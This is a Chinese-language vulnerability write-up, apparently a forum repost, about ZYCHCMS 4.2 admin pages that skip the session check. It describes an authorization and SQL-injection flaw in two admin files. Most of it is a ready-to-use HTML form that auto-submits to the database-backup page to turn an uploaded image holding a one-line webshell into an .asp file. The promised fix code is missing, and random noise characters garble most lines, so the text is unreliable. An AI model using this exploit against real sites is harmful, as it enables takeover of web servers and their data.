, E6 k" a( s7 f; T
- M+ b- q. J9 V: L
$ D. O! P) D1 w, h( }8 c' W( k
& `6 ^/ M! `8 L, t
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀) Q' J$ @/ F8 Q& ?% w& V4 e# d6 n
①SQL注射漏洞/ |* z1 U7 V* P; N! c
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
2 M9 p+ M* n$ t J" s+ f1 B 漏洞原因:未过滤
' I O1 X* D- y+ d 漏洞代码:$ K( ^9 v# J0 b b
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。( J8 {/ y) O. R- W* z
修复方法:在文件开头加入代码
: O1 U! U/ H5 i% ^
1 R% K2 b4 m/ l7 z) f/ D O2 Q% R" l; t$ k; H7 r) F- X; ?; x
②后台拿WBSHELL
, @) P( L2 ?8 u; `( z 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
3 }" k; Q: G) u" D% d# c* g& Y 这里在网上找了一个,改了下,将就着用。
2 F8 S! g1 l& ^% _, d4 g% N9 J 以下是代码本地提交代码
3 m, z+ j7 a. a , q/ }* p0 @" w' p. k+ d* f
- o5 z8 U( T8 C7 V
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
& N8 W v$ f' C& D& x/ ], a <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>3 E% P; B# s& \' H$ i) ]- s8 Q: |
<tr>
, R# d" W+ _( p, i <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
, @8 ^/ V! s5 w2 h8 z$ J S </tr>
" p2 F0 x, d/ x1 X R8 r; | <tr>
! h+ x# o2 ^% M) H2 A6 }; r3 R <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
2 `' l$ D2 y% O- o! @2 K7 Y1 Z </span>9 s$ T- ?7 r+ {' u) W" v3 O
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
& \# T/ b; z% N! \1 l7 L( E <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >5 S' V' \4 m% y+ A
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
" L: J/ `# ?+ g; j- p/ ] <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d/ K; L$ ~1 K5 i7 z6 j
<div align=”left”>
( Z g" s6 h' v$ W: T/ \8 T <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
% _5 T6 `9 \4 w: h- d/ `& k1 M <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>6 t% ?) }+ I4 W; g" i
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
( F1 k) ], k: B2 ]( q </div></td>
. s8 _. o* _6 G" N; S0 u </tr>1 ?9 a8 ]. f/ r2 L% r5 g* u& z
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
2 _& X/ O! I. U C <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
, s$ y0 X' q) E: u/ }" @( d <td class=”td”><div align=”left”>/ f) f" l6 q7 M
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
9 ], R2 N3 R7 [ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
: f; T5 `3 q4 _/ c* p; I8 j </tr>. ?4 X' D$ |% p* O) T
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>+ h- `8 O; h9 c# [$ |
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
7 ?( v Q+ |% `3 o <td class=”td”><div align=”left”>
9 h2 X6 D6 E( L$ M {" r9 Q$ y <input type=”submit” value=”确定备份” class=”btn”
4 q8 T& }1 I4 O; d, W/ I6 l* O </div></td>
J3 G, h8 u- v7 H& {- i </tr>
! c" M2 T8 t, B! s0 P) k! w3 g </table></td></tr></form>
- m+ A/ f+ z1 D </table>7 X$ ]: r6 _1 T- {4 p
</td>
* z7 {9 v) |8 D </tr>+ p: ]* @3 U4 r& C' L
</table>3 @# V9 x: q& p
<script>. c) B) q7 ]: p- S+ N% X0 ]. w
document.all.add.submit();
6 r: T8 Y8 u! t9 |% H! G </script>( O, k. C& h1 v7 S3 U# v
3 D4 Q% W" Q" P% W2 j, y! u% \% b! `6 \( `! [$ m
8 S! d4 M" g8 _$ t6 G
1 Y- w/ a7 m2 h: o- N& \ r9 h0 V# h" w* G2 U2 F
2 X6 N- t6 p, N3 y$ Z; Z* m* T4 A# V0 @
& g# m! j& `0 n/ L' Q8 |. N
& d D: r9 z' i* |- i% `$ F
% K; U2 _9 v' A3 @ |